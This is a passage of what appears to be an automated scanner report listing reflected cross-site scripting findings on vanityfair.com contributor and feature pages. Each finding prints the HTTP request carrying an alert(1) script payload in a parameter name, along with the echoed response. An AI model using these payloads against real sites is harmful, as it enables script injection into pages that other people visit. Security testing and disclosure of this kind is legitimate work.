Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 846e2"><script>alert(1)</script>d952b19c0e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contributors/marnie-hanel?846e2"><script>alert(1)</script>d952b19c0e7=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:55:08 GMT
Date: Mon, 29 Nov 2010 16:50:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133243


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/contributors/marnie-hanel?printable=true&846e2"><script>alert(1)</script>d952b19c0e7=1" title="Print this page">
...[SNIP]...

1.134. http://www.vanityfair.com/contributors/mike-ryan [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /contributors/mike-ryan

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e56b1"><script>alert(1)</script>6f8d0e02704 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contributors/mike-ryan?e56b1"><script>alert(1)</script>6f8d0e02704=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:55:07 GMT
Date: Mon, 29 Nov 2010 16:50:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129329


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/contributors/mike-ryan?printable=true&e56b1"><script>alert(1)</script>6f8d0e02704=1" title="Print this page">
...[SNIP]...

1.135. http://www.vanityfair.com/contributors/sarah-ball [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /contributors/sarah-ball

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca22c"><script>alert(1)</script>8901a6d7aa6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contributors/sarah-ball?ca22c"><script>alert(1)</script>8901a6d7aa6=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:55:08 GMT
Date: Mon, 29 Nov 2010 16:50:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130145


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/contributors/sarah-ball?printable=true&ca22c"><script>alert(1)</script>8901a6d7aa6=1" title="Print this page">
...[SNIP]...

1.136. http://www.vanityfair.com/culture/features/2010/10/sean-parker-201010 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /culture/features/2010/10/sean-parker-201010

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 930eb"><script>alert(1)</script>71eaac9a959 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/features/2010/10/sean-parker-201010?930eb"><script>alert(1)</script>71eaac9a959=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:52:42 GMT
Date: Mon, 29 Nov 2010 16:47:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109976


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/culture/features/2010/10/sean-parker-201010?printable=true&930eb"><script>alert(1)</script>71eaac9a959=1" title="Print this page">
...[SNIP]...

1.137. http://www.vanityfair.com/culture/features/2010/11/basquiat-slide-show-201011 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /culture/features/2010/11/basquiat-slide-show-201011

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87845"><script>alert(1)</script>316ea3f21d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/features/2010/11/basquiat-slide-show-201011?87845"><script>alert(1)</script>316ea3f21d6=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:52:41 GMT
Date: Mon, 29 Nov 2010 16:47:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109339


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/culture/features/2010/11/basquiat-slide-show-201011?printable=true&87845"><script>alert(1)</script>316ea3f21d6=1" title="Print this page">
...[SNIP]...

1.138. http://www.vanityfair.com/culture/features/2010/11/james-hamilton-slide-show-201011 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /culture/features/2010/11/james-hamilton-slide-show-201011

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e7d2"><script>alert(1)</script>d38e6bf6c97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/features/2010/11/james-hamilton-slide-show-201011?1e7d2"><script>alert(1)</script>d38e6bf6c97=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:52:40 GMT
Date: Mon, 29 Nov 2010 16:47:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109748


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/culture/features/2010/11/james-hamilton-slide-show-201011?printable=true&1e7d2"><script>alert(1)</script>d38e6bf6c97=1" title="Print this page">
...[SNIP]...

1.139. http://www.vanityfair.com/culture/features/2010/11/joy-division-slide-show-201011 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /culture/features/2010/11/joy-division-slide-show-201011

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52825"><script>alert(1)</script>22195c1cb8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/features/2010/11/joy-division-slide-show-201011?52825"><script>alert(1)</script>22195c1cb8e=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:52:37 GMT
Date: Mon, 29 Nov 2010 16:47:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112219


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/culture/features/2010/11/joy-division-slide-show-201011?printable=true&52825"><script>alert(1)</script>22195c1cb8e=1" title="Print this page">
...[SNIP]...

1.140. http://www.vanityfair.com/culture/features/2010/11/kanye-201011 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /culture/features/2010/11/kanye-201011

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1057c"><script>alert(1)</script>c698c9c1472 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/features/2010/11/kanye-201011?1057c"><script>alert(1)</script>c698c9c1472=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:52:36 GMT
Date: Mon, 29 Nov 2010 16:47:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 98739


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/culture/features/2010/11/kanye-201011?printable=true&1057c"><script>alert(1)</script>c698c9c1472=1" title="Print this page">
...[SNIP]...

1.141. http://www.vanityfair.com/culture/features/2010/11/rolling-stones-slide-show-201011 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /culture/features/2010/11/rolling-stones-slide-show-201011

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f71e3"><script>alert(1)</script>c8a15aac23e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/features/2010/11/rolling-stones-slide-show-201011?f71e3"><script>alert(1)</script>c8a15aac23e=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:52:36 GMT
Date: Mon, 29 Nov 2010 16:47:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 110301


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/culture/features/2010/11/rolling-stones-slide-show-201011?printable=true&f71e3"><script>alert(1)</script>c8a15aac23e=1" title="Print this page">
...[SNIP]...

1.142. http://www.vanityfair.com/culture/features/2010/11/thanksgiving-pilgrim-midterms-201011 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /culture/features/2010/11/thanksgiving-pilgrim-midterms-201011

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44431"><script>alert(1)</script>950a0f9ee4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/features/2010/11/thanksgiving-pilgrim-midterms-201011?44431"><script>alert(1)</script>950a0f9ee4e=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:52:36 GMT
Date: Mon, 29 Nov 2010 16:47:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 99587


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/culture/features/2010/11/thanksgiving-pilgrim-midterms-201011?printable=true&44431"><script>alert(1)</script>950a0f9ee4e=1" title="Print this page">
...[SNIP]...

1.143. http://www.vanityfair.com/culture/features/2010/12/npr-slide-show-201012 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /culture/features/2010/12/npr-slide-show-201012

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10547"><script>alert(1)</script>541fd455c87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/features/2010/12/npr-slide-show-201012?10547"><script>alert(1)</script>541fd455c87=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:52:34 GMT
Date: Mon, 29 Nov 2010 16:47:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106141


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/culture/features/2010/12/npr-slide-show-201012?printable=true&10547"><script>alert(1)</script>541fd455c87=1" title="Print this page">
...[SNIP]...

1.144. http://www.vanityfair.com/culture/features/2010/12/vanishing-blonde-201012 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /culture/features/2010/12/vanishing-blonde-201012

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 894e9"><script>alert(1)</script>90206af854f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/features/2010/12/vanishing-blonde-201012?894e9"><script>alert(1)</script>90206af854f=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Expires: Mon, 29 Nov 2010 16:52:35 GMT
Date: Mon, 29 Nov 2010 16:47:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106608


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/culture/features/2010/12/vanishing-blonde-201012?printable=true&894e9"><script>alert(1)</script>90206af854f=1" title="Print this page">
...[SNIP]...

1.145. http://www.vanityfair.com/culture/features/2010/12/walters-201012 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vanityfair.com
Path:   /culture/features/2010/12/walters-201012

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b32ea"><script>alert(1)</script>6089bdb47d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/features/2010/12/walters-201012?b32ea"><script>alert(1)</script>6089bdb47d2=1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
